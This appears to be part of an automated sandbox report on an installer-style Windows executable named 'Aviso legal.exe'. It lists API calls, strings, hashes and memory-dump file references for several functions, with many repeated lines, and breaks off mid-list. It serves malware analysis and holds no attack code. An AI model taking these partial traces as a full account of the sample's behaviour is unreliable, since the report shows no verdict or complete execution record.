ShowWindow.USER32(00000000), ref: 004058D7
ShowWindow.USER32(?,00000008), ref: 004058DC
ShowWindow.USER32(00000008), ref: 00405926
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040595A
CreatePopupMenu.USER32 ref: 0040596B
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 0040597F
GetWindowRect.USER32(?,?), ref: 0040599F
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004059B8
SendMessageW.USER32(?,00001073,00000000,?), ref: 004059F0
OpenClipboard.USER32(00000000), ref: 00405A00
EmptyClipboard.USER32 ref: 00405A06
GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405A12
GlobalLock.KERNEL32(00000000), ref: 00405A1C
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A30
GlobalUnlock.KERNEL32(00000000), ref: 00405A50
SetClipboardData.USER32(0000000D,00000000), ref: 00405A5B
CloseClipboard.USER32 ref: 00405A61

Strings

{, xrefs: 00405944

Memory Dump Source

Source File: 00000000.00000002.1404090581.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1404062758.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404144684.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Aviso legal.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendChangeClientDataEmptyFindLockMetricsNotificationOpenSystemThreadTrackUnlock
String ID: {
API String ID: 4154960007-366298937
Opcode ID: 943fc32418130b232fc7306fa704d0383798a9d724e6e480ce665c9b6ea9918b
Instruction ID: 6b97441d6f4cfe62a880681573964a63c423f2dd70b2063085686802d9cc5617
Opcode Fuzzy Hash: 943fc32418130b232fc7306fa704d0383798a9d724e6e480ce665c9b6ea9918b
Instruction Fuzzy Hash: C8B169B1900608FFDB119FA0DD85AAE7B79FB44355F00803AFA41BA1A0C7755E51DF58

Function 00405C49 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 148
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileW.KERNELBASE(?,?,75E03420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405C72
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\nstAE84.tmp,\*.*), ref: 00405CBA
lstrcatW.KERNEL32(?,0040A014), ref: 00405CDD
lstrlenW.KERNEL32(?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nstAE84.tmp,?,?,75E03420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CE3
FindFirstFileW.KERNELBASE(C:\Users\user\AppData\Local\Temp\nstAE84.tmp,?,?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nstAE84.tmp,?,?,75E03420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CF3
FindNextFileW.KERNELBASE(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405D93
FindClose.KERNELBASE(00000000), ref: 00405DA2

Strings

C:\Users\user\AppData\Local\Temp\nstAE84.tmp, xrefs: 00405CA2, 00405CA8, 00405CB9, 00405CF2
., xrefs: 00405D04
C:\Users\user\AppData\Local\Temp\, xrefs: 00405C56
\*.*, xrefs: 00405CB4
., xrefs: 00405D18

Memory Dump Source

Source File: 00000000.00000002.1404090581.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1404062758.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404144684.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Aviso legal.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: .$.$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nstAE84.tmp$\*.*
API String ID: 2035342205-3100592058
Opcode ID: 91e5555b9508150fcf6e55f7c9d4dc2ae8152fc7335161658e002f7252bbf59f
Instruction ID: 8b2ee76931e9ba666d6dc67a471f1b560bbb00ea1adf29c264b32972d7114dcf
Opcode Fuzzy Hash: 91e5555b9508150fcf6e55f7c9d4dc2ae8152fc7335161658e002f7252bbf59f
Instruction Fuzzy Hash: 3D41A130900A14BADB216B65CC8DABF7678DF81714F14817FF841B21D1D77C4A819EAE

Function 00406873 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(?,004302B8,C:\Users\user\AppData\Local\Temp\nstAE84.tmp,00405F5D,C:\Users\user\AppData\Local\Temp\nstAE84.tmp,C:\Users\user\AppData\Local\Temp\nstAE84.tmp,00000000,C:\Users\user\AppData\Local\Temp\nstAE84.tmp,C:\Users\user\AppData\Local\Temp\nstAE84.tmp, 4u,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,75E03420,C:\Users\user\AppData\Local\Temp\), ref: 0040687E
FindClose.KERNELBASE(00000000), ref: 0040688A

Strings

C:\Users\user\AppData\Local\Temp\nstAE84.tmp, xrefs: 00406873

Memory Dump Source

Source File: 00000000.00000002.1404090581.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1404062758.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404144684.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Aviso legal.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: C:\Users\user\AppData\Local\Temp\nstAE84.tmp
API String ID: 2295610775-2550375725
Opcode ID: 86d0f84efe5cb21a5e65899ed37e92679b9de560e532c409a12d624e9ae3e839
Instruction ID: 67599a3b69382adcf67454a25bfea179debcebd0a6e2e92eb77ede12202c023a
Opcode Fuzzy Hash: 86d0f84efe5cb21a5e65899ed37e92679b9de560e532c409a12d624e9ae3e839
Instruction Fuzzy Hash: C3D012325192205FC3402B386E0C84B7A989F16331726CB76B4AAF51E0D7388C7387BD

Function 00403F9A Relevance: 51.4, APIs: 34, Instructions: 357
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403FD6
ShowWindow.USER32(?), ref: 00403FF6
GetWindowLongW.USER32(?,000000F0), ref: 00404008
ShowWindow.USER32(?,00000004), ref: 00404021
DestroyWindow.USER32 ref: 00404035
SetWindowLongW.USER32(?,00000000,00000000), ref: 0040404E
GetDlgItem.USER32(?,?), ref: 0040406D
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00404081
IsWindowEnabled.USER32(00000000), ref: 00404088
GetDlgItem.USER32(?,00000001), ref: 00404133
GetDlgItem.USER32(?,00000002), ref: 0040413D
SetClassLongW.USER32(?,000000F2,?), ref: 00404157
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004041A8
GetDlgItem.USER32(?,00000003), ref: 0040424E
ShowWindow.USER32(00000000,?), ref: 0040426F
KiUserCallbackDispatcher.NTDLL(?,?), ref: 00404281
EnableWindow.USER32(?,?), ref: 0040429C
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004042B2
EnableMenuItem.USER32(00000000), ref: 004042B9
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004042D1
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004042E4
lstrlenW.KERNEL32(0042D268,?,0042D268,00000000), ref: 0040430E
SetWindowTextW.USER32(?,0042D268), ref: 00404322
ShowWindow.USER32(?,0000000A), ref: 00404456

Memory Dump Source

Source File: 00000000.00000002.1404090581.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1404062758.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404144684.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Aviso legal.jbxd

Similarity

API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID:
API String ID: 121052019-0
Opcode ID: f65e638bec718107b599af9a82b264fc0764d6b1c1dffbdcb4ef221558e01a13
Instruction ID: 19e8ffe36521fda3862950d2389d84f1ef0c133ac5ff71005f69e3a94542e2f3
Opcode Fuzzy Hash: f65e638bec718107b599af9a82b264fc0764d6b1c1dffbdcb4ef221558e01a13
Instruction Fuzzy Hash: DDC1A1B1A00704ABDB206F61EE49E2B3A68FB84746F15053EF741B61F1CB799841DB2D

Function 00403BEC Relevance: 44.0, APIs: 13, Strings: 12, Instructions: 215
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040690A: GetModuleHandleA.KERNEL32(?,00000020,?,0040363D,0000000B), ref: 0040691C
Part of subcall function 0040690A: GetProcAddress.KERNEL32(00000000,?), ref: 00406937

lstrcatW.KERNEL32(1033,0042D268), ref: 00403C6D
lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp\geokemi,1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000,00000002,75E03420), ref: 00403CED
lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp\geokemi,1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000), ref: 00403D00
GetFileAttributesW.KERNEL32(Call,?,00000000,?), ref: 00403D0B
LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp\geokemi), ref: 00403D54

Part of subcall function 00406484: wsprintfW.USER32 ref: 00406491

RegisterClassW.USER32(00433EA0), ref: 00403D91
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403DA9
CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403DDE
ShowWindow.USER32(00000005,00000000,?,00000000,?), ref: 00403E14
GetClassInfoW.USER32(00000000,RichEdit20W,00433EA0), ref: 00403E40
GetClassInfoW.USER32(00000000,RichEdit,00433EA0), ref: 00403E4D
RegisterClassW.USER32(00433EA0), ref: 00403E56
DialogBoxParamW.USER32(?,00000000,00403F9A,00000000), ref: 00403E75

Strings

1033, xrefs: 00403C0C, 00403C68
RichEdit, xrefs: 00403E47
.exe, xrefs: 00403CFA
Control Panel\Desktop\ResourceLocale, xrefs: 00403C20
C:\Users\user\AppData\Local\Temp\, xrefs: 00403BF1
Call, xrefs: 00403CB4, 00403CBD, 00403CCB, 00403D1A, 00403D20
_Nb, xrefs: 00403D70, 00403DD8
RichEd20, xrefs: 00403E1A
RichEd32, xrefs: 00403E28
RichEdit20W, xrefs: 00403E38, 00403E3E
C:\Users\user\AppData\Local\Temp\geokemi, xrefs: 00403C7C, 00403C84, 00403D27, 00403D2D, 00403D3D
.DEFAULT\Control Panel\International, xrefs: 00403C58

Memory Dump Source

Source File: 00000000.00000002.1404090581.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1404062758.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404144684.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Aviso legal.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: .DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\geokemi$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
API String ID: 1975747703-4154578928
Opcode ID: 247e99db93e8ebfdf0a38293e80ea72ef88d87fbb8185d5a325867b954932979
Instruction ID: 6cc527b2f10929733706d009ff8c1d9b21e511251dd9cb17fe62514cef47010a
Opcode Fuzzy Hash: 247e99db93e8ebfdf0a38293e80ea72ef88d87fbb8185d5a325867b954932979
Instruction Fuzzy Hash: F561A670140300BED721AF66ED46F2B3A6CEB84B5AF40453FF945B62E2CB7D59018A6D

Function 0040307D Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 181
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 0040308E
GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Aviso legal.exe,00000400,?,?,?,?,?,0040387D,?), ref: 004030AA

Part of subcall function 0040602D: GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\Desktop\Aviso legal.exe,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
Part of subcall function 0040602D: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,0040387D,?), ref: 00406053

GetFileSize.KERNEL32(00000000,00000000,00444000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Aviso legal.exe,C:\Users\user\Desktop\Aviso legal.exe,80000000,00000003,?,?,?,?,?,0040387D), ref: 004030F6
GlobalAlloc.KERNELBASE(00000040,}8@,?,?,?,?,?,0040387D,?), ref: 0040322C

Strings

soft, xrefs: 0040316B
}8@, xrefs: 00403227, 00403242
C:\Users\user\Desktop, xrefs: 004030D8, 004030DD, 004030E3
C:\Users\user\AppData\Local\Temp\, xrefs: 00403084
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403253
C:\Users\user\Desktop\Aviso legal.exe, xrefs: 00403094, 004030A3, 004030B7, 004030D7
Error launching installer, xrefs: 004030CD
Null, xrefs: 00403174
Inst, xrefs: 00403162

Memory Dump Source

Source File: 00000000.00000002.1404090581.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1404062758.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404144684.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Aviso legal.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Aviso legal.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft$}8@
API String ID: 2803837635-1714225219
Opcode ID: b2925046ebf4ee23c20be954f21b6b8de3b8febbf6f0f410cc7df6a070a5bb34
Instruction ID: 750c061bb954c4555836cecba7cc54c639b148d890841a972b43b12454d44aa7
Opcode Fuzzy Hash: b2925046ebf4ee23c20be954f21b6b8de3b8febbf6f0f410cc7df6a070a5bb34
Instruction Fuzzy Hash: 7951B571904204AFDB10AF65ED42B9E7EACAB48756F14807BF904B62D1C77C9F408B9D

Function 0040657A Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 196
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 00406695
GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nscAAC8.tmp\System.dll,?,004055D6,Skipped: C:\Users\user\AppData\Local\Temp\nscAAC8.tmp\System.dll,00000000,00000000,00425A20,75E023A0), ref: 004066A8
lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040671F
lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nscAAC8.tmp\System.dll,?,004055D6,Skipped: C:\Users\user\AppData\Local\Temp\nscAAC8.tmp\System.dll,00000000), ref: 00406779

Strings

Call, xrefs: 004065A4, 00406657, 0040665E, 00406662, 0040667F, 00406694, 004066A7, 004066BC, 004066E9, 0040671E, 00406724, 00406741, 00406754, 00406772, 00406778, 00406781, 004067B7
Skipped: C:\Users\user\AppData\Local\Temp\nscAAC8.tmp\System.dll, xrefs: 0040659F
\Microsoft\Internet Explorer\Quick Launch, xrefs: 00406719
Software\Microsoft\Windows\CurrentVersion, xrefs: 00406663

Memory Dump Source

Source File: 00000000.00000002.1404090581.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1404062758.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404144684.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Aviso legal.jbxd

Similarity

API ID: Directory$SystemWindowslstrcatlstrlen
String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nscAAC8.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 4260037668-3785291791
Opcode ID: 53df47af1f5a73dc8aac5f91b902a2f592a76225dad1704ff93b3cf34011d1c5
Instruction ID: 685928b229c5d1fd60d609eb920d771e11fa4d776b5b66b0bad6c944a0f90ddf
Opcode Fuzzy Hash: 53df47af1f5a73dc8aac5f91b902a2f592a76225dad1704ff93b3cf34011d1c5
Instruction Fuzzy Hash: 1D61D131900205EADB209F64DD80BAE77A5EF54318F22813BE907B72D0D77D99A1CB5D

Function 004032B4 Relevance: 17.7, APIs: 4, Strings: 6, Instructions: 166
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 0040331E
GetTickCount.KERNEL32 ref: 004033C5
MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004033EE
wsprintfW.USER32 ref: 00403401

Strings

}8@, xrefs: 004032B4
... %d%%, xrefs: 004033FB
*B, xrefs: 004032DF
A, xrefs: 00403374
ZB, xrefs: 004033A2, 004033BD, 0040343A
A, xrefs: 0040347E

Memory Dump Source

Source File: 00000000.00000002.1404090581.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1404062758.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404144684.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
